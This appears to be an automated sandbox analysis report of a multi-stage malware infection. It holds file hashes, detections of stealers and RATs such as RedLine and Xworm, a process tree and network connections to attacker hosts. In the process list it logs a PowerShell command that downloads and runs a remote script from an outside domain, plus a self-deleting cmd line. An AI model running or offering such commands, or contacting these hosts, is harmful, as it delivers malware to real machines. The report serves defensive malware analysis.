| SHA512 | 0300850c601f430a62901c9f5f948d1ddf36a42df1ba656a98dd0ed6e9df2a0e8286640bffee2b6a1af226d49e5704dc4bece24a0b5e9a1a43fccbd1446cbc3d |
\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | ce3ea16e1159f4fc88aecf88aaa65d74 |
| SHA1 | 0e10ec0e388f0c5b50e874dfe9043b259b128e84 |
| SHA256 | c6e0d9adfec451041caefaa228dc0b9fe920cfe6e6feb12d7b04fc3a9dde2731 |
| SHA512 | 9cda6db9e8e2aaa78024c9227c04db08c4cc7a3714374108a5bd559157672d80a502bc2ba4485e8c8ed461d6bd4b9207865756aa249f1bc31e13db2d2e04f24d |
\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | 71bc5aae999c6cb4afd59137e93ba217 |
| SHA1 | 2409bba3d33504ab9d78e791b23940aae47c96ba |
| SHA256 | a30854a7cdf0e5ae4bd59fc78e09e8a0352356e47620be6f6e8e979fbdea0a63 |
| SHA512 | f2210770237ad03f3753ff0881b99ca449b3554d63d5eaac28fb05ac664954bccd31c4990ec8c2a0ba6064a362b0058e0f57de8e2ccd8b606f10295aa1bb2a0d |
memory/1136-164-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-162-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-153-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-137-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-133-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-131-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-128-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-98-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-96-0x0000000004C00000-0x0000000004E03000-memory.dmp
memory/1136-92-0x0000000004C00000-0x0000000004E03000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
| MD5 | a0cc1241aa4803dc23ff778af73e3768 |
| SHA1 | 75d07c8f1784e8e64e7520c2666bc63c2a477ffa |
| SHA256 | c0b12bbdcb41f6941d4356309fd8a43f61cbfd18eee044ff1771cbdbba248466 |
| SHA512 | 3ccb46eca07827f5c86b31da5f7ab1b4a4b80f0cf3c1f8245c9ea57cf7c2244bc5f867a09696ce1c80cce38c631c7f6a13dca537b8e4b297735324f52cabb755 |
\Users\Admin\AppData\Local\Temp\Files\build2.exe
| MD5 | 8dbe4455b90ea13ebed8a2c0b82ee946 |
| SHA1 | a52eeb41ee54c2e4c2bb3f9acc4736a8b63d7d83 |
| SHA256 | 4f76248f31947b55b87ba31fa355925e5f03bbd74602d701ef965c7ff339d90f |
| SHA512 | 8081340f4b00e208962306c6d7abf89d6e18477925d47b6f4eccfdf7bf1b3f07d74c90a344740d48f7af4e1e434921e96784e6be5e27c4f27d85e8e4e2bcc3bb |
memory/2172-440-0x00000000002C0000-0x00000000003C0000-memory.dmp
memory/2172-441-0x0000000000280000-0x00000000002B1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
| MD5 | 6ebc6be56ffc0574650ace621e91a95f |
| SHA1 | 436cbd187f201ddd3f565e26885fc951483bc60b |
| SHA256 | b70f0bad345b154dea3b21e2afed5f0088b73905a38f05850e6090c2116b509f |
| SHA512 | f6c1cab4414ab1a4db885e4e6918af6e81ab97e6cecd5d3b97e2fc834c99b35b4586df7de6aea112d3730c8c3d0608e03aa8e60018371dbb7d6805b4c4767220 |
\Users\Admin\AppData\Local\Temp\Files\build2.exe
| MD5 | 83a20f6b751cf88a90a2de3ff9c36b16 |
| SHA1 | 8441270837832fca23aa606e995fd9118876a062 |
| SHA256 | 550ab9c6be1fdec2ece55072778a8d09c47ac5978c99965bc3a09e5b35dd7841 |
| SHA512 | c6efcfffe12ad08aaccd255196fbea84f053e2686f04a9842b6449a1650d94a7de6884b8c019ffd96f607d71c6ef7f35aeffdeba68e2e3d512b213bb67ab2852 |
memory/2808-455-0x0000000000400000-0x0000000000644000-memory.dmp
\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
| MD5 | ab13d611d84b1a1d9ffbd21ac130a858 |
| SHA1 | 336a334cd6f1263d3d36985a6a7dd15a4cf64cd9 |
| SHA256 | 7b021b996b65f29cae4896c11d3a31874e2d5c4ce8a7a212c8bedf7dcae0f8ae |
| SHA512 | c608c3cba7fcad11e6e4ae1fc17137b95ee03b7a0513b4d852405d105faf61880da9bf85b3ce7c1c700adedbf5cdccaae01e43a0345c3f1ee01b639960de877f |
memory/2772-721-0x0000000000020000-0x0000000000021000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
| MD5 | 9379b6e19fb3154d809f8ad97ff03699 |
| SHA1 | b6e4e709a960fbb12c05c97ed522d59da8a2decb |
| SHA256 | e97b0117c7dc1aeb1ef08620ed6833ee61d01ce17c1e01f08aa2a51c5278beca |
| SHA512 | b181ccc6811f788d3a24bb6fa36b516f2c20d1258fecec03a0429f8ab3fd4b74fc336bfec1b9d1f5f01532ae6f665bfaac4784cab5b8b20fd8ee31a11d551b21 |
C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
| MD5 | dfd712f2777f0f14ef5aa473deb2da73 |
| SHA1 | 29f5520cd0717c34b8735ad8cffe938b9d3572ce |
| SHA256 | bbfa6a07c9cba1d645b8ceb275bb4f38f739080186c838fae31cf5955ad13039 |
| SHA512 | 1950de1e0334293c8681ca3a23e391862b635535d8167732365e8fb45a925b502e51f26ede09a12b395f025adfac3745dae1791e8594f5feb50dd5737fb4dd58 |
\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
| MD5 | 60700276d860f636e9b9adf6be40d471 |
| SHA1 | 64dde727e823658496601c1ca8919e4ac896b430 |
| SHA256 | 7193c52953b1f3f7343e9c3db9179bee8ec03c22b73c489aa9837dc3e5880443 |
| SHA512 | 3cb025a313f0f0c906a6f9ebf8675c5bacb85c53a2bb0a5b8e6b6e3ea88dfb820b5710381a79db74f44ae6571f0449c62f4550fdcedd603dc698e637157323cc |
memory/1796-822-0x000000013F7F0000-0x000000013F868000-memory.dmp
memory/1796-893-0x000000001B4C0000-0x000000001B560000-memory.dmp
\Users\Admin\AppData\Local\Temp\Files\r.exe
| MD5 | b3db8db328d89d5d301bdabd65901c33 |
| SHA1 | f18c01ee928be6ca78968d9e1478c0d5bcd805c9 |
| SHA256 | 98bae997d1e2fc6b793a25536f907d66157e741264db635c470ace0311c70b30 |
| SHA512 | c9d95f418ad4e0816d383664f38cc3b67d77909c4b999fac9e0535aa6d275e120ae204abc3ba787592568d47fdf1ddb7321c7a8b37600777fc890a6b4fc7230b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c3c127492e090a9452e1d7158e1b409 |
| SHA1 | 0760f68b204c5427329fe744324143c07589a637 |
| SHA256 | 612569c97b627926d49741c52805e7aebfb26a5841841e31e96ed946737ad97c |
| SHA512 | 5f1705e0c29e102c367c88eab9f8794ac19928550cdedf543e1622a3162ad8d4ab0f747fe87d191d6b89d228f0689ff2a5f3fc78179b298c7e6e9dc59db063f4 |
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
| MD5 | 614a613062f4be5d75936376c4da25ce |
| SHA1 | e08ba1171b9c9674dd0e3c1c029814f79e2084fe |
| SHA256 | ceb94d484f0241432751619082e07acae723e9d0391737c64abaa511210f5b85 |
| SHA512 | a44091d1cd658de716b33d662f503d573a28c6009dbaa99c3e6ff32b51dd7faa6104b1bb9fdb104b69e2c5d0faa1d0603304c43149132af200e49aa20662428c |
\Users\Admin\AppData\Local\Temp\Files\ma.exe
| MD5 | b575af7fc655998dc587120ad88d63c1 |
| SHA1 | bcb2f4cd757fed4b54f2bf2e7789d55224125166 |
| SHA256 | 07c01956bf49d65a52340c6ace05640f821b02aa99fec60718ca3771d0d17f23 |
| SHA512 | 7fe6e9a05bb6cd47b38f1bf7b6ec1379390c6b27c0df556abee01f221e894619e3e96005b310f106727e76aa4d708ba44dc852a5a9756b94c942c65415f21bae |
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
| MD5 | 094259a23ce6480a13acaf952dfb0aac |
| SHA1 | f30c211defb833059c52bd6eb0fe5f6e6b1603b9 |
| SHA256 | bfd365d0b832d1d626ea58dd81b81d5cebfd54558a8f3d09af55ceccb65db958 |
| SHA512 | 3a395f25b31a0aba2ca12da2289e22e171780215d5dca772328fa6deb1e5133ed8d734494db5d89aef8343cbd76c8b6e3a6713f4bc85e76e37eab668247edd96 |
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
| MD5 | f4e4a02f1ae6de1e4f8a57b527c61f13 |
| SHA1 | 1cf3e2d18942666b1cd09bb4a1d6ec27b0e5a548 |
| SHA256 | 2fac8922a1bb2cbe38b4229e91030345fc32e1c12e0acb6929bf974aebf1806e |
| SHA512 | 09f0bb8ca8a80404baa1551eb3d1c880dc91d52cadb71776d83ccfe2625a96b6fc553af96dc275147400c121465d621379171c4289eb0351e103bae4ba389743 |
memory/968-1182-0x0000000000CE0000-0x00000000011E4000-memory.dmp
\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
| MD5 | 43d34d37347f89db406fbeffafda3bdd |
| SHA1 | 7d66931d9d5352b7f92f6980c56d7db41479e7ae |
| SHA256 | 1a6a24485c916b539f005a9e065ef2237d75c5cb68ef6a7585b736ad8a0f4186 |
| SHA512 | b42e9f3bf427411e3b69bd6f87d4df2a51ddb2825f20d43684e59e75b891de832ec798f6ebb2fd7147097373e6bbf5d1b93a953863a4f121bf27502de8048123 |
memory/1844-1195-0x0000000000DE0000-0x0000000001008000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
| MD5 | 19e73cd873f860b987a6249288f44329 |
| SHA1 | 659796443ef3e795217fafd93fd75489006aa83d |
| SHA256 | 69df5707d1b59b221423fcb8198a9ef23501c38cf58702c15ad82f2b37b21288 |
| SHA512 | 9d6a20ba297cd6f16901fd357caa8a700b11e30a1f2c52cc2b4408f4d0401115c6cc151ef829f8391d48a83b590ec8a74c3355bd62be351659fd674c38653eb5 |
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
| MD5 | 952a2f58b6c7bf4133585b3159dd956c |
| SHA1 | c4720bb5deec9be7af4ae0234c5bb839c50245bc |
| SHA256 | 64a2d784b916df990f963ccd9a66c25e16d38de106dfa9e80ab6375f9aaaa6ae |
| SHA512 | 3741318fc73f17bb45b6a0272984f20b9c195a06863eb85d736ffa088da3757477e647a18ae1066af015dac5ebf792521a6de4ea56d69c8b4d203d1c06b64221 |
C:\Users\Admin\AppData\Local\Temp\tmp780D.tmp.bat
| MD5 | 149ee945fc75ef5de3661af29886ecbd |
| SHA1 | 83701dd9aad6b441fbf517d5ae67c09f35e6ab6e |
| SHA256 | 25cdc5161800589680cc023ec706054d6a611c41941577489f922af7bfa548e6 |
| SHA512 | 009491fa89ca69734b6256ee1e79076a43cf45ed69dfe2d5cd9e1fcb6999fde441a3ecf2e061a8beaefbd390328f923f6dc2918f7718d97eeb275f4e8f69b919 |
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
| MD5 | 007843e3b274bc3c8474656a6aa68590 |
| SHA1 | e20c378c3e1a96716c7e28035e9a4a75f59ec8e0 |
| SHA256 | 6d74fc4c7ac833eb6d2eafd9bcf2d1f2fd12ef2217576cee928c76cb0e5cf4b1 |
| SHA512 | 3d41164ed48464fe768220ba9db3b958aad97a5e03b31756ae26d22b2de5702a2d047aa78918b2815e3b49a214ec5824cc663950b2b524bd925260eb14273cdf |
memory/968-1278-0x000007FEF5CE0000-0x000007FEF66CC000-memory.dmp
memory/2268-1280-0x0000000000A40000-0x0000000000F44000-memory.dmp
memory/1796-1281-0x000007FEF5CE0000-0x000007FEF66CC000-memory.dmp
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
| MD5 | 8d6760fc8e845e527a9770536d4dbd3f |
| SHA1 | 6ff47f3f28fe7bf60981cab063379884b17fd2ae |
| SHA256 | c3558b9289e338439936da9c6810bffa1502fccf828abee3241622982eaeca1f |
| SHA512 | 03c11e4863bcc79cf6c7d489d697c2539cba369bdb377049c85d3e50c9e2a9dfd0ec507ff95e3331cd219667e4ac3801bd56d1e6d1202fe8e1d9cc6be8e54291 |
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
| MD5 | bb398fe88da91528938380fcb90e4564 |
| SHA1 | 5b667cbb8ab54cc004263ec8ebac60b0f8484480 |
| SHA256 | 10a3aac04353f6f2096f02052aa5105b4474f13896a7718fa8c001b059a4f2b9 |
| SHA512 | ae760146741ae11a27865abd17feb1423ddce89bd0e034c697060965986b70c498b245ac670816599da885d101006e70d94d2d003d1e641cad207e83f5f7e54a |
C:\Users\Admin\AppData\Local\Temp\Files\RobluxCoins.exe
| MD5 | 39d70d0ec1d2013f1dd2c30e7f22b930 |
| SHA1 | c7a37c2b36b37f64632e1dceb6468c48aa6ba9bb |
| SHA256 | 7bf52c3fa707ed3e151eece69d7985cf5c01735f5f84efb89b60b3e9bffdb79d |
| SHA512 | 1028bf447e16dbdebcd270714ea3bc6a6b1b00c1a8e1170318ecf7a2304af7983581bba80cbaf79f9cd99fd4af6c258e6d1043dc9f67219578a3158a2bd2ced8 |
memory/2536-1296-0x0000000002C50000-0x0000000002D50000-memory.dmp
memory/2536-1299-0x0000000000230000-0x0000000000260000-memory.dmp
memory/2536-1312-0x0000000000400000-0x0000000002B0D000-memory.dmp
memory/2268-1322-0x0000000000130000-0x0000000000131000-memory.dmp
memory/2268-1325-0x000007FEF5CE0000-0x000007FEF66CC000-memory.dmp
memory/1796-1330-0x000000001BC60000-0x000000001BCE0000-memory.dmp
memory/1616-1332-0x0000000000AE0000-0x0000000000B4C000-memory.dmp
memory/2268-1319-0x000000001C0C0000-0x000000001C140000-memory.dmp
memory/1844-1316-0x0000000074B40000-0x000000007522E000-memory.dmp
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
| MD5 | 2bc35706a7400979e245d619ac78d836 |
| SHA1 | cdd7a904f77d74e606b8cbf4d2466601a4cec72e |
| SHA256 | 4ce2762488b2f816005aafedba13b65ac7a8136ce76eba9b2f6ef86f485f187b |
| SHA512 | 551492a0c76223d30a843f5255bfcea1c07fd20b2b7242ccfcaf10de31de167e7e64faaaf686c9a450bb0d3b303ddd79bee364f426cc741f2668e0d1823c19fd |
\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
| MD5 | 72bd5990ea8d3b9fe0a9b236b5a33fc5 |
| SHA1 | 4f5ac0bf36caf9b80faf5f92cabee33762f74436 |
| SHA256 | 498e1723c1c1f3456d60147129d69689d267acb634fe8bfd9dc4d14dc725972e |
| SHA512 | 7bd0b7efda41ac9e1b17be33f25646631f3781e7252c36cda4b4e75604694c87f29af53a9e5595b898a8c76eb410e74f8cb6a441c9b3cddce27ef6b5c640b07c |
C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
| MD5 | 11efe9eb63cc68fbe542a76974ba5483 |
| SHA1 | 879cc1e41d3013f3f415c1de1a3dc105cf50191d |
| SHA256 | 67111974ffd115cc66b9a9cc1827c7a506b5eab035073c930eabb10baa23ae38 |
| SHA512 | 450a90206b708e0355f235adead3750e58357ad61ff21d8475b2acb82d64ae0f2a56c88d54b58d1218ecc47f763660ef819d932944c0a192cd59b42698260b02 |
C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
| MD5 | 4579ae493bb6bfb736357294fb50687e |
| SHA1 | b04c0185a9ada3481203256b3225d1e065ef5028 |
| SHA256 | cff3adbf7a5668aae35ae6cfd4b86777417167141f959aa4a667f45116567649 |
| SHA512 | 250b6f847a3690193d89a71086c7973daef8520fc56db82d3b0a6381d87b7c81daa4b69467dd27c72680d6a793e1528248c943ccdfc8c9f6d129d3f55f728d28 |
memory/2772-1361-0x0000000000400000-0x00000000004D8000-memory.dmp
memory/1716-1362-0x0000000004B40000-0x0000000004B80000-memory.dmp
memory/1616-1359-0x0000000000AE0000-0x0000000000B4C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | 5f5a148361889423093100648e9d91ae |
| SHA1 | 530f6439f3397bb78ce31d6ff7a9f8e552052c80 |
| SHA256 | 86cda17453d1105d6e78a822041e01fffed73547d257229cb517555fddcf1631 |
| SHA512 | e4d3410b97c7effe5c155cf927ddeca36ef9e9cef96d59fb7c23b45eb7c799cdbfe34c46a2d96d90212180b0713ca48836d11ec2294af32543af57b232bb293e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\fouette.ini
| MD5 | eb4da25d6c0d919bbe9ebc480cee0d05 |
| SHA1 | dfaeae9c23e9b282a82b1abb971599a5bcd51b27 |
| SHA256 | 70a4ee88b132159f110d96ad83001187c6a272f52d5c766f563b50ac1e072fe3 |
| SHA512 | 1e9972196d4bdbbc7366c1fc980014b3048d036f56afdeb39303263cc7af24217490dd9b9ca85ac11a0bf83a1c31eead3320e158e8b9ac819468023d1548cb5c |
C:\Users\Admin\AppData\Local\Temp\Carmind.ini
| MD5 | 16d2907f72ba61bcf429972b96cb4069 |
| SHA1 | 9e4b5b253fd60f5af867610a6e0861ca0e426456 |
| SHA256 | 5fe8b9c597b96a9a541903505adb7899b7ed6b444c2f7d11913e836d66711448 |
| SHA512 | fcd064fb6fcb9e4b3184348671e2f3db3c4419abc02248151bde2654e30ce840c04a7410196a55eba39885ffa44335bdc18c9849972fe18a528f35787d57679c |
C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
| MD5 | b32fab896f5e701c1e816cd8c31c0ff5 |
| SHA1 | 475ed088fefe3ac3ccaf4c38868048fa7ed8ca8b |
| SHA256 | e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1 |
| SHA512 | 22ed1a9afc6caca896bee0c77d0dacb9c28747986566e176cdeb72b8cb3429323d73c5da795905a08941fa480e2e690d45edf8ce7efee4a77f5ba4c5442002d0 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-10 18:51
Reported
2024-02-10 18:54
Platform
win10v2004-20231222-en
Max time kernel
53s
Max time network
150s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2964 created 1052 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe | C:\Windows\system32\sihost.exe |
Xworm
ZGRat
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables packed with Themida
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables packed with unregistered version of .NET Reactor
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
Executes dropped EXE
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2604 set thread context of 2964 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe | C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe |
| PID 3012 set thread context of 3344 | N/A | C:\Users\Admin\AppData\Local\Temp\BBLb.exe | C:\Users\Admin\AppData\Local\Temp\BBLb.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\MSI.CentralServer.job | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
Enumerates physical storage devices
Program crash
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\app1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\app1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ss_conn_service.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ss_conn_service.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe
"C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe"
C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2964 -ip 2964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 448
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2964 -ip 2964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 444
C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe
"C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe"
C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://houssagynecologue.com/assets/js/debug2.ps1')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://houssagynecologue.com/assets/js/debug2.ps1')
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe"
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | power.poisontoolz.com | udp |
| US | 172.67.162.192:80 | power.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.162.67.172.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 193.233.132.73:80 | 193.233.132.73 | tcp |
| US | 8.8.8.8:53 | 73.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| CN | 175.24.197.196:80 | tcp | |
| FI | 135.181.121.233:1451 | tcp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| DE | 159.89.100.67:7000 | tcp | |
| US | 8.8.8.8:53 | 67.100.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lastimaners.ug | udp |
| RU | 91.215.85.223:80 | lastimaners.ug | tcp |
| US | 8.8.8.8:53 | 223.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | growrock.co.za | udp |
| ZA | 196.22.132.220:443 | growrock.co.za | tcp |
| US | 8.8.8.8:53 | 220.132.22.196.in-addr.arpa | udp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 8.8.8.8:53 | 46.16.20.195.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| DE | 185.172.128.154:80 | 185.172.128.154 | tcp |
| US | 8.8.8.8:53 | 35.20.181.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.128.172.185.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 80.232.23.103.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 108.181.20.35:443 | files.catbox.moe | tcp |
